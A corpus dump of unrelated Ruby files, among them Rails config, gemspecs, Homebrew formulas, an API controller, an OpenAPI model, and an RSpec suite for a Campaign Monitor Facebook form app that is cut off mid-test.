# your application in memory, allowing both threaded web servers
# and those relying on copy on write to perform better.
# Rake tasks automatically ignore this option for performance.
config.eager_load = true
# Full error reports are disabled and caching is turned on.
config.consider_all_requests_local = false
# Ensures that a master key has been made available in either ENV["RAILS_MASTER_KEY"]
# or in config/master.key. This key is used to decrypt credentials (and other encrypted files).
# config.require_master_key = true
# Disable serving static files from the `/public` folder by default since
# Apache or NGINX already handles this.
config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present?
# Enable serving of images, stylesheets, and JavaScripts from an asset server.
# config.asset_host = 'http://assets.example.com'
# Specifies the header that your server uses for sending files.
# config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX
# Store uploaded files on the local file system (see config/storage.yml for options).
config.active_storage.service = :local
# Mount Action Cable outside main process or domain.
# config.action_cable.mount_path = nil
# config.action_cable.url = 'wss://example.com/cable'
# config.action_cable.allowed_request_origins = [ 'http://example.com', /http:\/\/example.*/ ]
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
# config.force_ssl = true
# Include generic and useful information about system operation, but avoid logging too much
# information to avoid inadvertent exposure of personally identifiable information (PII).
config.log_level = :info
# Prepend all log lines with the following tags.
config.log_tags = [ :request_id ]
# Use a different cache store in production.
# config.cache_store = :mem_cache_store
# Use a real queuing backend for Active Job (and separate queues per environment).
# config.active_job.queue_adapter = :resque
# config.active_job.queue_name_prefix = "supertape_backend_api_production"
config.action_mailer.perform_caching = false
# Ignore bad email addresses and do not raise email delivery errors.
# Set this to true and configure the email server for immediate delivery to raise delivery errors.
# config.action_mailer.raise_delivery_errors = false
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation cannot be found).
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners.
config.active_support.deprecation = :notify
# Log disallowed deprecations.
config.active_support.disallowed_deprecation = :log
# Tell Active Support which deprecation messages to disallow.
config.active_support.disallowed_deprecation_warnings = []
# Use default logging formatter so that PID and timestamp are not suppressed.
config.log_formatter = ::Logger::Formatter.new
# Use a different logger for distributed setups.
# require "syslog/logger"
# config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name')
if ENV["RAILS_LOG_TO_STDOUT"].present?
logger = ActiveSupport::Logger.new(STDOUT)
logger.formatter = config.log_formatter
config.logger = ActiveSupport::TaggedLogging.new(logger)
end
# Do not dump schema after migrations.
config.active_record.dump_schema_after_migration = false
# Inserts middleware to perform automatic connection switching.
# The `database_selector` hash is used to pass options to the DatabaseSelector
# middleware. The `delay` is used to determine how long to wait after a write
# to send a subsequent read to the primary.
#
# The `database_resolver` class is used by the middleware to determine which
# database is appropriate to use based on the time delay.
#
# The `database_resolver_context` class is used by the middleware to set
# timestamps for the last write to the primary. The resolver uses the context
# class timestamps to determine how long to wait before reading from the
# replica.
#
# By default Rails will store a last write timestamp in the session. The
# DatabaseSelector middleware is designed as such you can define your own
# strategy for connection switching and pass that into the middleware through
# these configuration options.
# config.active_record.database_selector = { delay: 2.seconds }
# config.active_record.database_resolver = ActiveRecord::Middleware::DatabaseSelector::Resolver
# config.active_record.database_resolver_context = ActiveRecord::Middleware::DatabaseSelector::Resolver::Session
end
| 44.833333 | 114 | 0.765995 |
4a26e1df055a0ba629132e4e0661185a97325824 | 745 |
# Ensure this FILE NAME is the name you want for your library
# This is the primary criteria by which your library will be
# found by users of rubygems and sprouts
name = File.basename(__FILE__).split('.').shift
gem_wrap name do |t|
t.version = '2.0.4'
t.summary = "PureMVC is a lightweight framework for creating applications in ActionScript 3, based upon the classic Model-View-Controller design meta-pattern."
t.author = 'Cliff Hall'
t.email = '[email protected]'
t.homepage = 'http://www.puremvc.org'
t.sprout_spec =<<EOF
- !ruby/object:Sprout::RemoteFileTarget
platform: universal
url: http://puremvc.org/pages/downloads/AS3/PureMVC_AS3.zip
archive_path: PureMVC_AS3_2_0_4/src
EOF
end
| 37.25 | 167 | 0.714094 |
f70a8d052a3a7705a81930badf1578c482cc661f | 862 | module Authlogic
module Session
# = ActiveRecord Trickery
#
# Authlogic looks like ActiveRecord, sounds like ActiveRecord, but its not ActiveRecord. That's the goal here. This is useful for the various rails helper methods such as form_for, error_messages_for, or any
# method that expects an ActiveRecord object. The point is to disguise the object as an ActiveRecord object so we have no problems.
module ActiveRecordTrickery
def self.included(klass) # :nodoc:
klass.extend ClassMethods
klass.send(:include, InstanceMethods)
end
module ClassMethods # :nodoc:
def human_attribute_name(*args)
klass.human_attribute_name(*args)
end
end
module InstanceMethods # :nodoc:
def new_record?
new_session?
end
end
end
end
end | 33.153846 | 211 | 0.674014 |
7ab63e1ba1c5701d23944b11c43cd22de1521209 | 2,458 | require 'augeas'
require 'tempfile'
module AugeasSpec::Fixtures
# Creates a temp file from a given fixture name
# Doesn't explicitly clean up the temp file as we can't evaluate a block with
# "let" or pass the path back via an "around" hook.
def aug_fixture(name)
tmp = Tempfile.new("target")
tmp.write(File.read(my_fixture(name)))
tmp.close
return tmp
end
# Runs a particular resource via a catalog
def apply(*resources)
catalog = Puppet::Resource::Catalog.new
resources.each do |resource|
catalog.add_resource resource
end
catalog.apply
end
# Runs a resource and checks for warnings and errors
def apply!(*resources)
txn = apply(*resources)
# Check for warning+ log messages
loglevels = Puppet::Util::Log.levels[3, 999]
firstlogs = @logs.dup
@logs.select { |log| loglevels.include? log.level }.should == []
# Check for transaction success after, as it's less informative
txn.any_failed?.should_not be_true
# Run the exact same resources, but this time ensure there were absolutely
# no changes (as seen by logs) to indicate if it was idempotent or not
@logs.clear
txn_idempotent = apply(*resources)
loglevels = Puppet::Util::Log.levels[2, 999]
againlogs = @logs.select { |log| loglevels.include? log.level }
againlogs.should eq([]), "expected no change on second run (idempotence check),\n got: #{againlogs.inspect}"
txn_idempotent.any_failed?.should_not be_true, "expected no change on second run (idempotence check), got a resource failure"
@logs = firstlogs
txn
end
# Open Augeas on a given file. Used for testing the results of running
# Puppet providers.
def aug_open(file, lens, &block)
aug = Augeas.open(nil, nil, Augeas::NO_MODL_AUTOLOAD)
begin
aug.transform(
:lens => lens,
:name => lens.split(".")[0],
:incl => file,
:excl => []
)
aug.set("/augeas/context", "/files#{file}")
aug.load!
raise AugeasSpec::Error, "Augeas didn't load #{file}" if aug.match(".").empty?
yield aug
rescue Augeas::Error
errors = []
aug.match("/augeas//error").each do |errnode|
aug.match("#{errnode}/*").each do |subnode|
subvalue = aug.get(subnode)
errors << "#{subnode} = #{subvalue}"
end
end
raise AugeasSpec::Error, errors.join("\n")
ensure
aug.close
end
end
end
| 31.113924 | 129 | 0.648495 |
11240e6b7501aed39ef508cc8c79c151628aefc2 | 218 | Rails.application.routes.draw do
resources :pins
devise_for :users
root 'home#index'
get 'home/about'
# For details on the DSL available within this file, see http://guides.rubyonrails.org/routing.html
end
| 21.8 | 101 | 0.747706 |
031de8af83c91cfa82741f189f78344e0d53f7d3 | 4,128 | ## This is the rakegem gemspec template. Make sure you read and understand
## all of the comments. Some sections require modification, and others can
## be deleted if you don't need them. Once you understand the contents of
## this file, feel free to delete any comments that begin with two hash marks.
## You can find comprehensive Gem::Specification documentation, at
## http://docs.rubygems.org/read/chapter/20
Gem::Specification.new do |s|
s.specification_version = 2 if s.respond_to? :specification_version=
s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
s.rubygems_version = '1.3.5'
## Leave these as is they will be modified for you by the rake gemspec task.
## If your rubyforge_project name is different, then edit it and comment out
## the sub! line in the Rakefile
s.name = 'metriks'
s.version = '0.9.9.8'
s.date = '2017-04-26'
## Make sure your summary is short. The description may be as long
## as you like.
s.summary = "An experimental metrics client"
s.description = "An experimental metrics client."
## List the primary authors. If there are a bunch of authors, it's probably
## better to set the email to an email list or something. If you don't have
## a custom homepage, consider using your GitHub URL or the like.
s.authors = ["Eric Lindvall"]
s.email = '[email protected]'
s.homepage = 'https://github.com/eric/metriks'
## This gets added to the $LOAD_PATH so that 'lib/NAME.rb' can be required as
## require 'NAME.rb' or'/lib/NAME/file.rb' can be as require 'NAME/file.rb'
s.require_paths = %w[lib]
## Specify any RDoc options here. You'll want to add your README and
## LICENSE files to the extra_rdoc_files list.
s.rdoc_options = ["--charset=UTF-8"]
s.extra_rdoc_files = %w[README.md LICENSE]
## List your runtime dependencies here. Runtime dependencies are those
## that are needed for an end user to actually USE your code.
s.add_dependency('atomic', ["~> 1.0"])
s.add_dependency('hitimes', [ "~> 1.1"])
s.add_dependency('avl_tree', [ "~> 1.2.0" ])
s.add_dependency('HDRHistogram', [ "0.1.9" ])
## List your development dependencies here. Development dependencies are
## those that are only needed during development
# s.add_development_dependency('tomdoc', ["~> 0.2"])
s.add_development_dependency('mocha', ['~> 1.7'])
## Leave this section as-is. It will be automatically generated from the
## contents of your Git repository via the gemspec task. DO NOT REMOVE
## THE MANIFEST COMMENTS, they are used as delimiters by the task.
# = MANIFEST =
s.files = %w[
Gemfile
LICENSE
README.md
Rakefile
benchmark/samplers.rb
lib/metriks.rb
lib/metriks/counter.rb
lib/metriks/ewma.rb
lib/metriks/exponentially_decaying_sample.rb
lib/metriks/gauge.rb
lib/metriks/hdr_histogram.rb
lib/metriks/hdr_histogram_snapshot.rb
lib/metriks/histogram.rb
lib/metriks/meter.rb
lib/metriks/registry.rb
lib/metriks/reporter/graphite.rb
lib/metriks/reporter/librato_metrics.rb
lib/metriks/reporter/logger.rb
lib/metriks/reporter/proc_title.rb
lib/metriks/reporter/riemann.rb
lib/metriks/simple_moving_average.rb
lib/metriks/snapshot.rb
lib/metriks/time_tracker.rb
lib/metriks/timer.rb
lib/metriks/uniform_sample.rb
lib/metriks/utilization_timer.rb
metriks.gemspec
test/counter_test.rb
test/gauge_test.rb
test/graphite_reporter_test.rb
test/histogram_test.rb
test/librato_metrics_reporter_test.rb
test/logger_reporter_test.rb
test/meter_test.rb
test/metriks_test.rb
test/proc_title_reporter_test.rb
test/registry_test.rb
test/riemann_reporter_test.rb
test/test_helper.rb
test/thread_error_handling_tests.rb
test/timer_test.rb
test/utilization_timer_test.rb
]
# = MANIFEST =
## Test files will be grabbed from the file list. Make sure the path glob
## matches what you actually use.
s.test_files = s.files.select { |path| path =~ /^test\/.*_test\.rb/ }
end
| 38.943396 | 105 | 0.712694 |
1a5546236c2d1c7545debf001a207a5381f06233 | 170 | require File.expand_path('../../../../../../spec_helper', __FILE__)
describe "OpenSSL::PKey::EC::Point#invert!" do
it "needs to be reviewed for spec completeness"
end
| 28.333333 | 67 | 0.682353 |
bbd78aacf7a1fa1b36bd492684bb70312af7ec5d | 1,103 | class Fonttools < Formula
include Language::Python::Virtualenv
desc "Library for manipulating fonts"
homepage "https://github.com/fonttools/fonttools"
url "https://github.com/fonttools/fonttools/releases/download/4.13.0/fonttools-4.13.0.zip"
sha256 "63987cd374c39a75146748f8be8637634221e53fef15cdf76f17777676d8545a"
head "https://github.com/fonttools/fonttools.git"
bottle do
cellar :any_skip_relocation
sha256 "ca4cebdcc20adb4a2baf2d046bf473442ccfdb0e5b0fcaf29d3d59e41191a402" => :catalina
sha256 "b6a07cdc0477ecd7b33280284cebb828561545b7eb2596cb02043c34eb5ca2e2" => :mojave
sha256 "ad3109af81809ff975094d7cff4ef352b4661e20f3a419e3ff9e97997c31fcf2" => :high_sierra
sha256 "d7da6264fafb205c143adfbf07ebe709ee98a16b21dff6b591a6efb2e21877fe" => :x86_64_linux
end
depends_on "[email protected]"
def install
virtualenv_install_with_resources
end
test do
unless OS.mac?
assert_match "usage", shell_output("#{bin}/ttx -h")
return
end
cp "/System/Library/Fonts/ZapfDingbats.ttf", testpath
system bin/"ttx", "ZapfDingbats.ttf"
end
end
| 33.424242 | 94 | 0.777879 |
339ba82e49eb28b2b59725c6d02eaa58afda6949 | 1,790 | class Helmfile < Formula
desc "Deploy Kubernetes Helm Charts"
homepage "https://github.com/roboll/helmfile"
url "https://github.com/roboll/helmfile/archive/v0.111.0.tar.gz"
sha256 "91263ca1b058475f78a30da2965a74c03def503d1d1db350544bd486d954a4c4"
bottle do
cellar :any_skip_relocation
sha256 "da6898c0278a289578a3864d03015ed32163d2a149251f1701dd5a848aa67290" => :catalina
sha256 "aefd1a740181dcdfd17b232405d5920da2bada24f69b49fee3e3179ca1c3df31" => :mojave
sha256 "4e67e2a8c375c4f494ba87ae7d8449ea93ba1daa19f0cc4e26e35b1a4e215162" => :high_sierra
end
depends_on "go" => :build
depends_on "helm"
def install
system "go", "build", "-ldflags", "-X github.com/roboll/helmfile/pkg/app/version.Version=v#{version}",
"-o", bin/"helmfile", "-v", "github.com/roboll/helmfile"
end
test do
(testpath/"helmfile.yaml").write <<-EOS
repositories:
- name: stable
url: https://kubernetes-charts.storage.googleapis.com/
releases:
- name: vault # name of this release
namespace: vault # target namespace
labels: # Arbitrary key value pairs for filtering releases
foo: bar
chart: roboll/vault-secret-manager # the chart being installed to create this release, referenced by `repository/chart` syntax
version: ~1.24.1 # the semver of the chart. range constraint is supported
EOS
system Formula["helm"].opt_bin/"helm", "create", "foo"
output = "Adding repo stable https://kubernetes-charts.storage.googleapis.com"
assert_match output, shell_output("#{bin}/helmfile -f helmfile.yaml repos 2>&1")
assert_match version.to_s, shell_output("#{bin}/helmfile -v")
end
end
| 42.619048 | 136 | 0.682123 |
bfbc11952d475a2b64115269095b1d532f6d714c | 585 | module Api
module V1
class AuthenticationController < ApplicationController
def create
user = User.find_by(email: login_params[:email].downcase)
if user.present? && user.authenticate(login_params[:password])
user.update(token: SecureRandom.hex)
render json: UserSerializer.serialize(user), status: 201
else
render json: { errors: "Invalid Credentials" }, status: 404
end
end
private
def login_params
params.require(:credentials).permit(:email, :password)
end
end
end
end
| 26.590909 | 70 | 0.642735 |
6a71f421eab5c1bd04e076693bbc917b239b7c7b | 1,121 | require File.expand_path('../boot', __FILE__)
require 'rails/all'
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)
module TextrisExample
class Application < Rails::Application
# Settings in config/environments/* take precedence over those specified here.
# Application configuration should go into files in config/initializers
# -- all .rb files in that directory are automatically loaded.
# Set Time.zone default to the specified zone and make Active Record auto-convert to this zone.
# Run "rake -D time" for a list of tasks for finding time zone names. Default is UTC.
# config.time_zone = 'Central Time (US & Canada)'
# The default locale is :en and all translations from config/locales/*.rb,yml are auto loaded.
# config.i18n.load_path += Dir[Rails.root.join('my', 'locales', '*.{rb,yml}').to_s]
# config.i18n.default_locale = :de
# Do not swallow errors in after_commit/after_rollback callbacks.
config.active_record.raise_in_transactional_callbacks = true
end
end
| 41.518519 | 99 | 0.735058 |
f7d40264e45ca6f344977b9702e9db60c1b23a92 | 7,297 | =begin
#Gomematic OpenAPI
#API definition for Gomematic
The version of the OpenAPI document: 1.0.0-alpha1
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 4.0.0
=end
require 'date'
module Gomematic
class UserTeamParams
attr_accessor :team
attr_accessor :perm
class EnumAttributeValidator
attr_reader :datatype
attr_reader :allowable_values
def initialize(datatype, allowable_values)
@allowable_values = allowable_values.map do |value|
case datatype.to_s
when /Integer/i
value.to_i
when /Float/i
value.to_f
else
value
end
end
end
def valid?(value)
!value || allowable_values.include?(value)
end
end
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'team' => :'team',
:'perm' => :'perm'
}
end
# Attribute type mapping.
def self.openapi_types
{
:'team' => :'String',
:'perm' => :'String'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
if (!attributes.is_a?(Hash))
fail ArgumentError, "The input argument (attributes) must be a hash in `Gomematic::UserTeamParams` initialize method"
end
# check to see if the attribute exists and convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h|
if (!self.class.attribute_map.key?(k.to_sym))
fail ArgumentError, "`#{k}` is not a valid attribute in `Gomematic::UserTeamParams`. Please check the name to make sure it's valid. List of attributes: " + self.class.attribute_map.keys.inspect
end
h[k.to_sym] = v
}
if attributes.key?(:'team')
self.team = attributes[:'team']
end
if attributes.key?(:'perm')
self.perm = attributes[:'perm']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
if @team.nil?
invalid_properties.push('invalid value for "team", team cannot be nil.')
end
if @perm.nil?
invalid_properties.push('invalid value for "perm", perm cannot be nil.')
end
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if @team.nil?
return false if @perm.nil?
perm_validator = EnumAttributeValidator.new('String', ["user", "admin", "owner"])
return false unless perm_validator.valid?(@perm)
true
end
# Custom attribute writer method checking allowed values (enum).
# @param [Object] perm Object to be assigned
def perm=(perm)
validator = EnumAttributeValidator.new('String', ["user", "admin", "owner"])
unless validator.valid?(perm)
fail ArgumentError, "invalid value for \"perm\", must be one of #{validator.allowable_values}."
end
@perm = perm
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
team == o.team &&
perm == o.perm
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Integer] Hash code
def hash
[team, perm].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def self.build_from_hash(attributes)
new.build_from_hash(attributes)
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.openapi_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :Boolean
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
Gomematic.const_get(type).build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 29.188 | 203 | 0.615458 |
39f448fff3956b407616a286c65938b0cc7b1daa | 10 | #My Code!
| 5 | 9 | 0.6 |
4ae98e588f951f5b5f2238bc73fff3a6b70ea215 | 38 | module Refill
VERSION = '0.0.0'
end
| 9.5 | 19 | 0.657895 |
f8b1daf5f0e1013ca014f21250733f8889017ed7 | 1,320 | # frozen_string_literal: true
module Api
module V3
class LikesController < Api::V3::ApplicationController
before_action :doorkeeper_authorize!
before_action do
requires! :obj_type, values: %w[topic reply]
requires! :obj_id
end
# 赞一个信息
#F
# POST /api/v3/likes
#
# @param obj_type [String] 类型 [topic, reply]
# @param obj_id [Integer] 对应数据的编号
#
# == returns
# - count [Integer] 已赞的数量
def create
current_user.like(likeable)
likeable.reload
data = { obj_type: params[:obj_type], obj_id: likeable.id, count: likeable.likes_count }
render json: data
end
# 取消之前的赞
#
# DELETE /api/v3/likes
#
# @param (see #create)
# @return (see #create)
def destroy
current_user.unlike(likeable)
likeable.reload
data = { obj_type: params[:obj_type], obj_id: likeable.id, count: likeable.likes_count }
render json: data
end
private
def likeable
return @likeable if defined? @likeable
@likeable =
if params[:obj_type] == "topic"
Topic.find(params[:obj_id])
else
Reply.find(params[:obj_id])
end
end
end
end
end
| 23.571429 | 96 | 0.559848 |
e83856b5efe2f1ddf96b648a880a85dc3bb3dfa8 | 27,363 | require "helper"
set :environment, :test
OmniAuth.config.test_mode = true
describe "The Campaign Monitor Subscribe Form app" do
let(:app) { Sinatra::Application }
let(:user_id) { "7654321" }
let(:fb_token) { "xxxx" }
let(:cm_api_key) { "testapikey" }
before do
DataMapper.auto_migrate!
end
describe "GET /auth/facebook/callback?code=xyz" do
let(:auth_hash) {
{
"provider" => "facebook",
"uid" => user_id,
"info" => {},
"credentials" => {
"token" => fb_token,
"expires_at" => "1321747205",
"expires" => "true"
},
"extra" => {}
}
}
before do
OmniAuth.config.mock_auth[:facebook] = OmniAuth::AuthHash.new(auth_hash)
end
it "stores the correct session values and redirects" do
get "/auth/facebook/callback"
expect(last_request.env["rack.session"]["fb_auth"]["uid"]).to eq(user_id)
expect(last_request.env["rack.session"]["fb_token"]).to eq (fb_token)
expect(last_response.status).to eq(302)
expect(last_response.location).to eq("http://example.org/")
end
end
describe "GET /" do
context "when there's no session for the user" do
it "redirects to request authorisation" do
get "/"
expect(last_request.env["rack.session"]["fb_auth"]).to be_nil
expect(last_request.env["rack.session"]["fb_token"]).to be_nil
expect(last_response.status).to eq(302)
expect(last_response.location).to eq("http://example.org/auth/facebook")
end
end
context "when there's a session for the user but it doesn't match the current fb user" do
it "clears the session and redirects to request authorisation" do
get "/",
{ "facebook" => { "user_id" => user_id } },
{ "rack.session" => { "fb_auth" => { "uid" => "1234567" } } }
expect(last_request.env["rack.session"]["fb_auth"]).to be_nil
expect(last_request.env["rack.session"]["fb_token"]).to be_nil
expect(last_response.status).to eq(302)
expect(last_response.location).to eq("http://example.org/auth/facebook")
end
end
context "when the user is successfully authenticated but doesn't have a saved account" do
before do
stub_request(:get, "https://graph.facebook.com/v2.2/me?access_token=xxxx").
to_return(:status => 200, :body => "")
end
it "loads the main page, requesting that the user sign into Campaign Monitor" do
get "/",
{ "facebook" => { "user_id" => user_id } },
{ "rack.session" => { "fb_auth" => { "uid" => user_id }, "fb_token" => fb_token } }
expect(last_request.env["rack.session"]["fb_auth"]).to eq({ "uid" => user_id })
expect(last_request.env["rack.session"]["fb_token"]).to eq (fb_token)
expect(last_response.status).to eq(200)
expect(last_response.body).to include("Log into your account")
end
end
context "when the user is successfully authenticated and has a saved account" do
let(:page_id) { "7687687687" }
let(:page_name) { "test page" }
let(:client_id) { "testclientid" }
let(:list_id) { "testlistid" }
let(:account) {
Account.create(:api_key => cm_api_key, :user_id => user_id)
}
let(:form) {
Form.create(
:account => account, :page_id => page_id, :client_id => client_id,
:list_id => list_id, :intro_message => "Intro message!",
:thanks_message => "Thanks!", :include_name => true)
}
before do
account.save
form.save
stub_request(:get, "https://graph.facebook.com/v2.2/me?access_token=xxxx").
to_return(:status => 200, :body => %Q[{"id":"#{user_id}"}])
pages_response = <<-PAGES_RESPONSE
{
"data": [
{
"access_token": "testpageaccesstoken",
"category": "Internet/software",
"name": "#{page_name}",
"id": "#{page_id}",
"perms": [ "ADMINISTER", "EDIT_PROFILE", "CREATE_CONTENT",
"MODERATE_CONTENT", "CREATE_ADS", "BASIC_ADMIN"
]
}
],
"paging": {
"cursors": { "before": "before", "after": "after" }
}
}
PAGES_RESPONSE
stub_request(:get, "https://graph.facebook.com/v2.2/#{user_id}/accounts?access_token=#{fb_token}").
to_return(:status => 200, :body => pages_response)
page_fields_response = <<-FIELDS_RESPONSE
{
"picture": {
"data": {
"is_silhouette": false,
"url": "https://fbcdn-profile-a.akamaihd.net/hprofile-ak-xfa1/v/t1.0-1/c13.0.50.50/p50x50/blah_n.jpg?oh=blah&oe=5578EF5D&__gda__=blah"
}
},
"id": "#{page_id}"
}
FIELDS_RESPONSE
stub_request(:get, "https://graph.facebook.com/v2.2/#{page_id}?access_token=#{fb_token}&fields=picture").
to_return(:status => 200, :body => page_fields_response)
end
it "loads the main page with the user's saved details" do
get "/",
{ "facebook" => { "user_id" => user_id } },
{ "rack.session" => { "fb_auth" => { "uid" => user_id }, "fb_token" => fb_token } }
expect(last_request.env["rack.session"]["fb_auth"]).to eq({ "uid" => user_id })
expect(last_request.env["rack.session"]["fb_token"]).to eq (fb_token)
expect(last_response.status).to eq(200)
expect(last_response.body).to include(page_name)
end
end
end
describe "GET /saved/:page_id" do
let(:page_id) { "7687687687" }
context "when the user has not added the app to the page" do
before do
stub_request(:get, "http://graph.facebook.com/v2.2/7687687687").
to_return(:status => 200, :body => %Q[{"id":"#{page_id}","has_added_app":false,"link":"https://www.facebook.com/pages/my-page/#{page_id}"}])
end
it "shows the settings saved page" do
get "/saved/#{page_id}"
expect(last_response.status).to eq(200)
expect(last_response.body).to \
include(%Q[top.location = "http://www.facebook.com/add.php?api_key=testapikey&pages=1&page=#{page_id}";])
end
end
context "when the user has added the app to the page" do
before do
stub_request(:get, "http://graph.facebook.com/v2.2/7687687687").
to_return(:status => 200, :body => %Q[{"id":"#{page_id}","has_added_app":true,"link":"https://www.facebook.com/pages/my-page/#{page_id}"}])
end
it "shows the settings saved page" do
get "/saved/#{page_id}"
expect(last_response.status).to eq(200)
expect(last_response.body).to \
include(%Q[top.location = "https://www.facebook.com/pages/my-page/#{page_id}";])
end
end
end
describe "POST /apikey" do
context "when the Campaign Monitor API key is successfully retrieved" do
before do
stub_request(:get, "https://myusername:[email protected]/api/v3/apikey.json?SiteUrl=https://myaccount.createsend.com").
with(:headers => { "Content-Type" => "application/json; charset=utf-8" }).
to_return(:status => 200,
:headers => { "Content-Type" => "application/json; charset=utf-8" },
:body => %Q[{ "ApiKey": "#{cm_api_key}" }])
stub_request(:get, "https://graph.facebook.com/v2.2/me?access_token=xxxx").
to_return(:status => 200, :body => %Q[{"id":"#{user_id}"}])
stub_request(:get, "https://testapikey:[email protected]/api/v3/clients.json").
to_return(
:status => 200,
:body => %Q[[{"ClientID":"clientid","Name":"client name"}]],
:headers => { "Content-Type" => "application/json;charset=utf-8" })
end
it "returns a json payload containing account details" do
post "/apikey", {
"site_url" => "https://myaccount.createsend.com",
"username" => "myusername",
"password" => "mypassword"
}, {
"rack.session" => {
"fb_auth" => { "uid" => user_id }, "fb_token" => fb_token
}
}
expect(last_response.status).to eq(200)
expect(last_response.content_type).to eq("application/json;charset=utf-8")
expect(last_response.body).to \
eq(%Q[{"account":{"api_key":"#{cm_api_key}","user_id":"#{user_id}","clients":[{"ClientID":"clientid","Name":"client name"}]}}])
end
end
context "when the Campaign Monitor API key is not successfully retrieved" do
before do
stub_request(:get, "https://myusername:[email protected]/api/v3/apikey.json?SiteUrl=https://myaccount.createsend.com").
with(:headers => { "Content-Type" => "application/json; charset=utf-8" }).
to_return(:status => 400,
:headers => { "Content-Type" => "application/json; charset=utf-8" },
:body => %Q[{ "Code": 123, "Message": "Invalid username/password" }])
stub_request(:get, "https://graph.facebook.com/v2.2/me?access_token=xxxx").
to_return(:status => 200, :body => %Q[{"id":"#{user_id}"}])
end
it "returns a json payload containing an error message" do
post "/apikey", {
"site_url" => "https://myaccount.createsend.com",
"username" => "myusername",
"password" => "incorrectpassword"
}, {
"rack.session" => {
"fb_auth" => { "uid" => user_id }, "fb_token" => fb_token
}
}
expect(last_response.status).to eq(400)
expect(last_response.content_type).to eq("application/json;charset=utf-8")
expect(last_response.body).to \
eq(%Q[{"message":"Error getting API key..."}])
end
end
end
describe "GET /clients/:api_key" do
context "when a call to the Campaign Monitor API succeeds" do
before do
stub_request(:get, "https://testapikey:[email protected]/api/v3/clients.json").
to_return(
:status => 200,
:body => %Q[[{"ClientID":"clientid","Name":"client name"}]],
:headers => { "Content-Type" => "application/json;charset=utf-8" })
end
it "gets the clients for the account matching the api key" do
get "/clients/#{cm_api_key}"
expect(last_response.status).to eq(200)
expect(last_response.content_type).to eq("application/json;charset=utf-8")
expect(last_response.body).to eq(%Q[[{"ClientID":"clientid","Name":"client name"}]])
end
end
context "when a call to the Campaign Monitor API fails" do
before do
stub_request(:get, "https://testapikey:[email protected]/api/v3/clients.json").
to_return(
:status => 500,
:body => %Q[[{"Code": 500,"Message":"Sorry."}]],
:headers => { "Content-Type" => "application/json;charset=utf-8" })
end
it "gets an empty list" do
get "/clients/#{cm_api_key}"
expect(last_response.status).to eq(200)
expect(last_response.content_type).to eq("application/json;charset=utf-8")
expect(last_response.body).to eq("[]")
end
end
end
describe "GET /lists/:api_key/:client_id" do
let(:client_id) { "43242343" }
context "when a call to the Campaign Monitor API succeeds" do
before do
stub_request(:get, "https://testapikey:[email protected]/api/v3/clients/#{client_id}/lists.json").
to_return(
:status => 200,
:body => %Q[[{"ListID":"listid","Name":"list name"}]],
:headers => { "Content-Type" => "application/json;charset=utf-8" })
end
it "gets the subscriber lists for the client" do
get "/lists/#{cm_api_key}/#{client_id}"
expect(last_response.status).to eq(200)
